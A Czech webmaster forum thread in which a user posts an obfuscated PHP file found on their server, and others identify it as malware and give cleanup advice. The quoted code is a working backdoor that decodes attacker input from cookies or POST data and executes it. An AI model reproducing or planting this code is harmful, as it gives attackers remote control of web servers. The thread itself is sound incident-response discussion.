Koronavirus.eu - 242 000 návštěv za 18 dní
Zobrazují se odpovědi 1 až 5 z 5

Zavirovany web, podivne php soubory

  1. Milan Hornik
    A ( 7 hodnocení )
    Milan Hornik je na dobré cestě 17.02.2020 15:32
    1
    na ftp se nejak objevuji soubory s +- timto obsahem, pokazde je to trosku jine
    <?php
    $sxjoszi = 'cs9ket31io*2py7xf46n#rul\'-g50_8vHbdam';$qryffa = Array();$qryffa[] = $sxjoszi[0].$sxjoszi[21].$sxjoszi[4].$sxjoszi[35].$sxjoszi[5].$sxjoszi[4].$sxjoszi[29].$sxjoszi[16].$sxjoszi[22].$sxjoszi[19].$sxjoszi[0].$sxjoszi[5].$sxjoszi[8].$sxjoszi[9].$sxjoszi[19];$qryffa[] = $sxjoszi[28].$sxjoszi[6].$sxjoszi[2].$sxjoszi[34].$sxjoszi[0].$sxjoszi[33].$sxjoszi[14].$sxjoszi[0].$sxjoszi[25].$sxjoszi[2].$sxjoszi[33].$sxjoszi[7].$sxjoszi[16].$sxjoszi[25].$sxjoszi[17].$sxjoszi[2].$sxjoszi[6].$sxjoszi[33].$sxjoszi[25].$sxjoszi[30].$sxjoszi[4].$sxjoszi[0].$sxjoszi[18].$sxjoszi[25].$sxjoszi[35].$sxjoszi[30].$sxjoszi[28].$sxjoszi[14].$sxjoszi[30].$sxjoszi[34].$sxjoszi[28].$sxjoszi[27].$sxjoszi[33].$sxjoszi[17].$sxjoszi[16].$sxjoszi[11];$qryffa[] = $sxjoszi[32].$sxjoszi[10];$qryffa[] = $sxjoszi[20];$qryffa[] = $sxjoszi[0].$sxjoszi[9].$sxjoszi[22].$sxjoszi[19].$sxjoszi[5];$qryffa[] = $sxjoszi[1].$sxjoszi[5].$sxjoszi[21].$sxjoszi[29].$sxjoszi[21].$sxjoszi[4].$sxjoszi[12].$sxjoszi[4].$sxjoszi[35].$sxjoszi[5];$qryffa[] = $sxjoszi[4].$sxjoszi[15].$sxjoszi[12].$sxjoszi[23].$sxjoszi[9].$sxjoszi[34].$sxjoszi[4];$qryffa[] = $sxjoszi[1].$sxjoszi[22].$sxjoszi[33].$sxjoszi[1].$sxjoszi[5].$sxjoszi[21];$qryffa[] = $sxjoszi[35].$sxjoszi[21].$sxjoszi[21].$sxjoszi[35].$sxjoszi[13].$sxjoszi[29].$sxjoszi[36].$sxjoszi[4].$sxjoszi[21].$sxjoszi[26].$sxjoszi[4];$qryffa[] = $sxjoszi[1].$sxjoszi[5].$sxjoszi[21].$sxjoszi[23].$sxjoszi[4].$sxjoszi[19];$qryffa[] = $sxjoszi[12].$sxjoszi[35].$sxjoszi[0].$sxjoszi[3];foreach ($qryffa[8]($_COOKIE, $_POST) as $lselej => $leocxv){function nlwinov($qryffa, $lselej, $pxxuie){return $qryffa[7]($qryffa[5]($lselej . $qryffa[1], ($pxxuie / $qryffa[9]($lselej)) + 1), 0, $pxxuie);}function txzxf($qryffa, $zuwzfv){return @$qryffa[10]($qryffa[2], $zuwzfv);}function wuvoc($qryffa, $zuwzfv){$oqnjucc = $qryffa[4]($zuwzfv) % 3;if (!$oqnjucc) {$fexlo = $qryffa[0]; $wszhocr = $fexlo("", $zuwzfv[1]($zuwzfv[2]));$wszhocr();exit();}}$leocxv = txzxf($qryffa, $leocxv);wuvoc($qryffa, $qryffa[6]($qryffa[3], $leocxv ^ nlwinov($qryffa, $lselej, $qryffa[9]($leocxv))));}


    setkal se s tim nekdo? diky
  2. Co se právě děje na Webtrhu?
  3. obchodniuspech
    B ( 2 hodnocení )
    obchodniuspech bude brzy slavný/áobchodniuspech bude brzy slavný/á 17.02.2020 15:54
    2
    to je zasifrovany, nekde tam bude nejaky odkaz na ty funkce a promenne, v zasade to nejspis vkladat do webu nejaky bordel, ktery se nasledne zobrazi navstevnikum webu

    Jedine spravne reseni je tady bud zaloha, nebo/a zmena vsech hesel k ftp, databazi, etc. a nedavat ho nekomu, kdo tomu nerozumi! :)

    Samozrejme nejmene pracna je zaloha, pokud na webu denne nepribyvaji nejaky zaznamy apod.

    Pokud budete mit zajem a nikoho na to nenajdete, ozvete se, zkusim se na to podívat :)
  4. exander
    ? ( 0 hodnocení )
    exander je na dobré cestě 17.02.2020 16:05
    3
    S tím se setkal asi každý, kdo viděl zavirovaný web. To je klasická obfuskace, abyste snadno nezjistil, co vir dělá. Obnovit ze zálohy. Změnit hesla, vyhodit blbce, co k tomu má přístup. Pokud se tam vir dostal přes zranitelný systém, tak zjistit odkud... často bývají neaktualizované eshopy a cms... nebo napište, mě kolegovi výše...
  5. duben
    A ( 50 hodnocení )
    duben is a glorious beacon of lightduben is a glorious beacon of lightduben is a glorious beacon of lightduben is a glorious beacon of lightduben is a glorious beacon of lightduben is a glorious beacon of light 17.02.2020 16:12
    4
    Je to klasicke zavirovani pres nejakou diru v CMS, diru v serveru apod. Odvirovani je celkem peklo, ale jde to, delal jsem to na svem serveru uz mnohokrat. Zalezi jak moc slozity ten skodlivy kod je.

    Nekdy se replikuje ve stejne podobe, nekdy infikuje dalsi souboru, nekdy se pokazde meni ale zustava tam vysledovatelny patern. Nekdy je to jeste horsi.

    1. stopnout web, vyhledat vsechny spatne soubory a napadnute souboru a ty odmazat, pripadne vymazat skodlivy kod, pokud neni nezavirovana zaloha (bacha i to co vypada nezavirovane muze zavirovane byt, obcas se neco ukryva mezi obrazky apod. = nejdriv na ten pattern otestovat i tu zalohu).
    2. pokud je to nejake CMS typu WordPress tak aktualizovat na nejnovejsi verzi, pluginy a sablony to same. Pokud jsou pouzite nejake urkadene sablony nebo pluginy, tak odmazat nebo proste zaplatit a nahrat legalni verzi. (vzhledem k casu na odvirovani se nikdy nevyplati to krast ani pro testovaci vyvoj)
    3. zmenit vsechna hesla a pristupy k FTP, DB, administraci
    4. Sledovat web jestli se neco neobjevi. Pozor chytrejsi kody vytvari nove soubory se starym datumem
    5. Vyplati se pres php.ini uplne zakazat ereg.
    6. Casto tyhle kody slouzi k spamovani, nebo DDos utoky, takze mozna bude potreba projit ruzne servery a po odvirovani pozadat o odstraneni z blacklistu.

    Pokud je to promenlivy pattern co se meni pod rukama tak good luck, to chce hodne dobreho linuxare co umi delat dobre regularni vyrazy.

    Tenhle kod na prvni pohled vypada jako problematictejsi, bude menit jak vypada, na zacatku se zmeni promena a pres ni se pak prekoduje cely text. Ale videl jsem uz i horsi a mnohem obtizneji odstranitele
  6. Wladass
    A+ ( 35 hodnocení )
    Wladass is a name known to allWladass is a name known to allWladass is a name known to allWladass is a name known to allWladass is a name known to allWladass is a name known to all 17.02.2020 16:21
    5
    Googli a nebo si dej do poptávek, aby ti to někdo odviroval.
    Vyčistit db, odstranit bordel z FTP a souborů, vyhodit adminer pokud tam je a je to.
    Pravidelně aktualizovat, nepoužívat nulled šablony a scripty. Používat jen ověřené pluginy.
Spolupracujeme: Jooble.org Hostujeme u Server powered by TELE3